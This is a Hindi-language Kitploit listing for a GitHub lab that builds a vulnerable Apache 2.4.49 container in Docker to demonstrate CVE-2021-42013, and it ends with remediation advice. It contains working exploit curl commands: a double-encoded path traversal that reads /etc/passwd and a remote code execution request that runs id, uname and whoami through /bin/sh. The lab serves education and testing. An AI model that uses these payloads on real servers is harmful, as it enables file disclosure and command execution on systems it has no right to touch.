Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
apache-cve-2021-42013-lab — Docker वातावरण में Apache HTTP Server 2.4.49 (CVE-2021-42013) भेद्यता को दर्शाने वाला प्रयोगशाला अभ्यास। | Kitploit
उपकरण/GitHubGitHub/berraesen/apache-cve-2021-42013-lab
कंटेनर सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षालैब और अभ्यास
GitHubberraesen/apache-cve-2021-42013-lab

apache-cve-2021-42013-lab

Docker वातावरण में Apache HTTP Server 2.4.49 (CVE-2021-42013) भेद्यता को दर्शाने वाला प्रयोगशाला अभ्यास।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
1 महीना पहलेअभी तक समीक्षित नहीं

Apache HTTP Server 2.4.49 Path Traversal & Remote Code Execution (CVE-2021-42013)

परियोजना के बारे में

इस परियोजना में, मैंने Apache HTTP Server 2.4.49 संस्करण में पाए गए CVE-2021-42013 भेद्यता को Docker का उपयोग करके बनाए गए अपने प्रयोगशाला वातावरण में प्रदर्शित किया है।

उद्देश्य यह जांचना है कि यह भेद्यता कैसे उत्पन्न होती है, कैसे काम करती है, और नियंत्रित वातावरण में सिस्टम पर इसके प्रभाव क्या होते हैं।

यह कार्य केवल शैक्षिक और प्रयोगशाला उद्देश्यों के लिए तैयार किया गया है।

उपयोग की गई प्रौद्योगिकियाँ

  • Docker
  • Ubuntu 22.04
  • Apache HTTP Server 2.4.49
  • Bash
  • curl

परियोजना फ़ाइल संरचना

root@kitploit:~
.
├── Dockerfile
├── index.html
└── README.md

आवश्यकताएँ

परियोजना चलाने से पहले निम्नलिखित स्थापित होना आवश्यक है।

  • Docker Desktop
  • Git (वैकल्पिक)

स्थापना

सबसे पहले repository को अपने कंप्यूटर पर डाउनलोड करें।

root@kitploit:~
git clone https://github.com/berraesen/apache-cve-2021-42013-lab.git

फ़ोल्डर में प्रवेश करें।

root@kitploit:~
cd apache-cve-2021-42013-lab

Docker इमेज बनाएँ।

root@kitploit:~
docker build -t apache-2.4.49-src .

कंटेनर प्रारंभ करें।

root@kitploit:~
docker run -d -p 8081:80 --name apache-src apache-2.4.49-src

कंटेनर के अंदर प्रवेश करें।

root@kitploit:~
docker exec -it apache-src /bin/bash

Apache संस्करण की जाँच करें।

root@kitploit:~
/usr/local/apache2/bin/httpd -v

कंटेनर से बाहर निकलने के लिए:

root@kitploit:~
exit

Apache मॉड्यूल की जाँच करना

CGI मॉड्यूल सक्रिय है या नहीं, यह आप निम्न कमांड से जाँच सकते हैं।

root@kitploit:~
docker exec -it apache-src /usr/local/apache2/bin/apachectl -M

CGI मॉड्यूल को सक्रिय करना

root@kitploit:~
docker exec -it apache-src sed -i 's/#LoadModule cgid_module/LoadModule cgid_module/g' /usr/local/apache2/conf/httpd.conf

फिर Apache को पुनः प्रारंभ करें।

root@kitploit:~
docker exec -it apache-src /usr/local/apache2/bin/apachectl restart

CGI मॉड्यूल को बंद करने के लिए:

root@kitploit:~
docker exec -it apache-src sed -i 's/LoadModule cgid_module/#LoadModule cgid_module/g' /usr/local/apache2/conf/httpd.conf

फिर दोबारा restart करें।

भेद्यता का परीक्षण

Path Traversal

root@kitploit:~
curl.exe -v --path-as-is "http://localhost:8081/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd"

Remote Code Execution

root@kitploit:~
curl.exe -v --path-as-is "http://localhost:8081/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" --data "echo; id"

अधिक सिस्टम जानकारी देखने के लिए:

root@kitploit:~
curl.exe -s --path-as-is "http://localhost:8081/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh" --data "echo; id; uname -a; whoami" -o -

अपेक्षित परिणाम

स्थापना पूर्ण होने के बाद:

  • Apache 2.4.49 सफलतापूर्वक चलना चाहिए।
  • CGI मॉड्यूल सक्रिय होने पर भेद्यता देखी जा सकती है।
  • Path Traversal के माध्यम से सिस्टम फ़ाइलों तक पहुँच प्रदर्शित की जा सकती है।
  • RCE के साथ सर्वर पर कमांड निष्पादित किए जा सकते हैं, यह देखा जा सकता है।

भेद्यता की कार्य प्रणाली

root@kitploit:~
İstemci (cURL)
      │
      ▼
Apache HTTP Server 2.4.49
      │
      ▼
URL Normalization Hatası
      │
      ▼
Path Traversal
      │
      ├──────────────► CGI Kapalı
      │                     │
      │                     ▼
      │             Dosya erişimi mümkün olabilir
      │
      ▼
CGI Aktif
      │
      ▼
/bin/sh çalıştırılabilir
      │
      ▼
Remote Code Execution (RCE)

RCE परिदृश्य को प्रदर्शित करने के लिए mod_cgi मॉड्यूल को सक्रिय करना आवश्यक है।

निवारण

इस भेद्यता को दूर करने के लिए Apache HTTP Server को 2.4.51 या उससे नए संस्करण में अपग्रेड करने की अनुशंसा की जाती है। साथ ही, यदि CGI का उपयोग नहीं किया जा रहा है तो इसे अक्षम करने और केवल आवश्यक निर्देशिकाओं के लिए उचित पहुँच अनुमतियाँ परिभाषित करने की सलाह दी जाती है।

टूल डाउनलोड करें